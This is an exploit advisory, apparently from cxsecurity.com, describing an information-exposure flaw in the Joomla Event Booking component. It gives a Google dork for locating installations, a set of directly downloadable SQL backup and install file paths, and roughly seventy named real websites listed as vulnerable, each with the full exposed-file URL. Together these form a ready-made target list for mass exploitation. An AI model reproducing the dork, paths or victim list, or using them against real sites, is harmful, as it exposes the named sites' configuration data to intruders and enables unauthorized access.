Joomla com_eventbooking Components Database Backup Arbitrary File Download Vulnerability

2018.11.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : Joomla com_eventbooking Components Database Backup Arbitrary File Download Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 29/11/2018 # Vendor Homepage : extensions.joomla.org/extension/event-booking/ + joomdonation.com/joomla-extensions/events-booking-joomla-events-registration # Tested On : Windows and Linux # Category : WebApps # Software Download Link : + github.com/Jasonudoo/platform/tree/master/components/com_eventbooking # Software Price : $40 # Version Information : All Previous Versions and 3.8.3 # Exploit Risk : High # Google Dork : inurl:''/index.php?option=com_eventbooking'' EB_INVALID_EVENT inurl:/index.php?option=com_eventbooking&Itemid='' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /administrator/ # Exploit : /administrator/components/com_eventbooking/sql/config.eventbooking.sql /administrator/components/com_eventbooking/sql/createifnotexists.eventbooking.sql /administrator/components/com_eventbooking/sql/deposit.eventbooking.sql /administrator/components/com_eventbooking/sql/fields.eventbooking.sql /administrator/components/com_eventbooking/sql/install.eventbooking.sql /administrator/components/com_eventbooking/sql/invoices.eventbooking.sql /administrator/components/com_eventbooking/sql/menus.eventbooking.sql /administrator/components/com_eventbooking/sql/messages.eventbooking.sql /administrator/components/com_eventbooking/sql/plugins.eventbooking.sql /administrator/components/com_eventbooking/sql/themes.eventbooking.sql /administrator/components/com_eventbooking/sql/uninstall.eventbooking.sql ################################################################################################# # Example Vulnerable Sites => [+] forum-ruecken.de/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] flugschule-mergenthaler.de/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] hotelburgschmiet.de/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] albaauxilia.eu/home/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] chicagojewelryschool.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] conservationleague.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] geobid.pl/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] xtraordinarywomen.co.za/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] ctconline.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] adhasa.co.za/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] fif.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] visite.inventerrome.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] dakrez.cz/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] stmarysioc.org.au/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] dwarkamai.com/vidyapeeth/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] triathlonmalaysia.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] specialeventcoordinator.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] etkinlik.tusiad.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] ruslandacademie.nl/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] helian.hu/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] ifr-rosenheim.de/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] plusx.it/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] idese.es/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] city2city.entriesonline.co.za/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] alleventsafrica.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] powellriver.info/calendar/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] sapsp.pl/kursy/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] pccca.net/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] kkn.cz/gdpr/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] rightevents.co.uk/OnlineRegistration/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] wepridefest.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] townofgretna.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] amclub.org.sg/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] unitedwayplains.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] ecwexford.ie/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] missoulaeduplace.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] mosquefoundation.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] arkansasaerospace.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] nedsra.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] t2b.ca/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] eckildare.ie/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] pathsinc.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] meriwethersnw.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] runningreece.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] theseasonedfarmhouse.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] wolds-gliding.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] caraniche.com.au/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] ftp.crosier.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] akshaystudy.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] mnlcp.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] anthracitegolf.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] africanpro.co.za/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] satoa.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] segway.lu/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] salsacasino.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] buffspine.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] amanieacademy.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] centrestpierre.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] dutchuniversitycollege.nl/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] yorkshirelawsociety.org.uk/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] medwaysafety.co.uk/courses/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] kundalini-yoga.us/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] mb.electricity.lu/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] sandiegobritishcarday.org/portal/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] islandpferde-auensee.de/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] f-keys.co.uk/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] minnesotaselassie.org/5k/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] rcanevents.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] alsace-qualite.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] duceducationalcentre.nl/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] pazparalamujer.org/administrator/components/com_eventbooking/sql/config.eventbooking.sql [+] artistrytalent.com/administrator/components/com_eventbooking/sql/config.eventbooking.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top